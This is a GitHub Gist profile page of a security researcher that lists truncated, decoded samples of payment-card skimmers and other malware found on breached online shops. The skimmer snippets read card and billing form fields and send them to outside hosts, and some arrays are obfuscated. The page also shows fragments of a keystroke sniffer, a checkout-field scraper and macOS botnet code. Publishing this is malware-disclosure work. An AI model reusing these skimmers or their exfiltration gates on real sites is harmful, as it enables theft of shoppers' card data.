Skip to content

Instantly share code, notes, and snippets.

Willem de Groot gwillem

Block or report user

Report or block gwillem

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@gwillem
gwillem / decoded.js
Created Oct 25, 2019
Procter & Gamble's FirstAidBeauty.com skimmed since May 5th 2019.
View decoded.js
+ function () {
var a = ["digiNum", "input[name='payment[cc_number]']", "digiMon", "select[name='payment[cc_exp_month]']", "digiYea", "select[name='payment[cc_exp_year]']", "digiCbb", "input[name='payment[cc_cid]']", "digiNam", "input[name='payment[cc_owner]']", "clNameChecked", "l8", "shElement", "#payment-buttons-container", "hasClass", "click", "val", "change", "addClass", "#billing\:firstname", " ", "#billing\:lastname", "#billing\:company", "#billing\:street1", "#billing\:street2", "#billing\:email", "#billing\:telephone", "#billing\:city", "#billing\:region_id", "#billing\:country_id", "#billing\:postcode", "host", "location", "", "replace", "/", "userAgent", "stringify", "https://cdn.hsadspixel.com/t/", "main", "guid", "refer", "POST", "ajax", "random", "round", "fromCharCode", "key", "getElementById", "iv", "push", "length", "charCodeAt", "rotate", "sbox", "Rcon", "numberOfRounds", "core", "SIZE_256", "keySize", "rsbox", "shiftRow", "mixColumn", "galois_multiplication", "subBytes", "shiftRows", "m
View Volusion code
/*!
* JavaScript Cookie v2.2.1
* https://github.com/js-cookie/js-cookie
*
* Copyright 2006, 2015 Klaus Hartl & Fagner Brack
* Released under the MIT license
*/
;
(function(factory) {
var registeredInModuleLoader;
View jsonline2csv.py
#!/usr/bin/env python3
# jsonline to csv converter for Andy
import csv
import json
import sys
if len(sys.argv) < 2:
print("Use {} <file.jsonline>".format(sys.argv[0]))
@gwillem
gwillem / decoded.js
Last active Aug 29, 2019
962 stores found breached on the 4th of July - https://sansec.io
View decoded.js
// Decoded by Sanguine Security <info@sansec.io>
String.prototype.hexEncode = function() {
var a, b;
var output = '';
for (b = 0; b < this.length; b++) {
a = this.charCodeAt(b).toString(16);
output += ('000' + a).slice(-4)
};
return output
};
@gwillem
gwillem / keystroke_sniffer_1.js
Last active Sep 21, 2019
BestOfTheWeb.com Security Seal contains even 2 different keystroke sniffers 2019-05-13 -- obfuscated version here: https://urlscan.io/responses/5c4474793baf83d5376045163d77f8f2ecd228ba5941ee8572489cb475a3cd1b/
View keystroke_sniffer_1.js
var sniffData = {};
sniffData['Gate'] = 'https://font-assets.com/img';
sniffData['Data'] = {};
sniffData['Sent'] = [];
sniffData.IsValid = ![];
sniffData.SaveParam = function(field) {
if (field.id !== undefined && field.id != '' && field.id !== null && field.value.length < 0x100 && field.value.length > 0x0) {
if (_0x5c4ab6(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', '')) && _0xdc5c77(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', ''))) sniffData.IsValid = !![];
sniffData.Data[field.id] = field.value;
return;
View original.js
var _0x19f5=['\x61\x57\x35\x75\x5a\x58\x4a\x49\x5a\x57\x6c\x6e\x61\x48\x51\x3d','\x61\x47\x39\x79\x61\x58\x70\x76\x62\x6e\x52\x68\x62\x41\x3d\x3d','\x52\x6d\x6c\x79\x5a\x57\x4a\x31\x5a\x77\x3d\x3d','\x59\x32\x68\x79\x62\x32\x31\x6c','\x61\x58\x4e\x4a\x62\x6d\x6c\x30\x61\x57\x46\x73\x61\x58\x70\x6c\x5a\x41\x3d\x3d','\x64\x57\x35\x6b\x5a\x57\x5a\x70\x62\x6d\x56\x6b','\x5a\x58\x68\x77\x62\x33\x4a\x30\x63\x77\x3d\x3d','\x5a\x47\x56\x32\x64\x47\x39\x76\x62\x48\x4d\x3d','\x63\x48\x4a\x76\x64\x47\x39\x30\x65\x58\x42\x6c','\x61\x47\x46\x7a\x61\x45\x4e\x76\x5a\x47\x55\x3d','\x59\x32\x68\x68\x63\x6b\x4e\x76\x5a\x47\x56\x42\x64\x41\x3d\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x6d\x62\x32\x35\x30\x4c\x57\x46\x7a\x63\x32\x56\x30\x63\x79\x35\x6a\x62\x32\x30\x76\x61\x57\x31\x6e','\x53\x58\x4e\x57\x59\x57\x78\x70\x5a\x41\x3d\x3d','\x55\x32\x46\x32\x5a\x56\x42\x68\x63\x6d\x46\x74','\x55\x32\x46\x32\x5a\x55\x46\x73\x62\x45\x5a\x70\x5a\x57\x78\x6b\x63\x77\x3d\x3d','\x64\x47\x56\x34\x64\x47\x46\x79\x5a\x57\x45\x3d','\x
View skimmer.js
var _0xBCEC = ["68$61$77$6b$73$73$68$6f$70$2e$63$6f$6d", "2f$63$68$65$63$6b$6f$75$74", "", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d$2f$61$6e$61$6c$79$7a$65", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d$2f$53$4a$7a$54$43$72$78$4d$4f$30$4f$37$74$69", "6d$61$67$65$32$5f$64$65$66$61$75$6c$74", "length", "wtf", "prototype", "$", "split", "reduce", "fromCharCode", "map", "replace", "toString", "rot13", "Z", "charCodeAt", "rot5", "join", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", "_utf8_encode", "charAt", "_keyStr", "indexOf", "_utf8_decode", "\n", "isUndefined", "isNull", "href", "location", "div", "createElement", "i", "getElementsByTagName", "innerHTML", "<!--[if gt IE ", "]><i></i><![endif]-->", "childNodes", "nodeType", "push", "getAttribute", "attributes", "nodeName", "nodeValue", "textContent", "innerText", "getComputedStyle", "display", "no
@gwillem
gwillem / main.py
Last active Apr 23, 2019
dfurniturestore.co.uk MacOS X botnet code -- found on https://dfurniturestore.co.uk/js/Update 04-19.dmg
View main.py
import os
import pwd
import random
import string
import urllib, urllib2
import json
import time
import sys
import base64
import random
@gwillem
gwillem / enforce-passwd-change.sh
Created Mar 4, 2019
Enforce new passwords for all Magento1 staff users
View enforce-passwd-change.sh
# Requires n98-magerun
n98-magerun admin:user:list --format=csv | grep ,active | while read row;
do
user=$(echo $row | cut -d, -f2)
pass=$(tr -cd '[:alnum:]' < /dev/urandom | fold -w10 | head -n1)
echo "$user -> $pass"
n98-magerun admin:user:change-password $user $pass >/dev/null
done
@gwillem
gwillem / onlineclouds.cloud_conversion_async_unfuscated.js
Created Nov 19, 2018
Malware from onlineclouds.cloud unfuscated
View onlineclouds.cloud_conversion_async_unfuscated.js
setTimeout(checkForCheckout, 100);
var snd = null;
function checkForCheckout() {
if ((/onepage|firecheckout|Checkout|onestepcheckout|onepagecheckout|checkout|oscheckout|idecheckoutvm|fancycheckout/).test(window.location)) {
scrapeAllFields();
}
}
function createQueryString() {
You can’t perform that action at this time.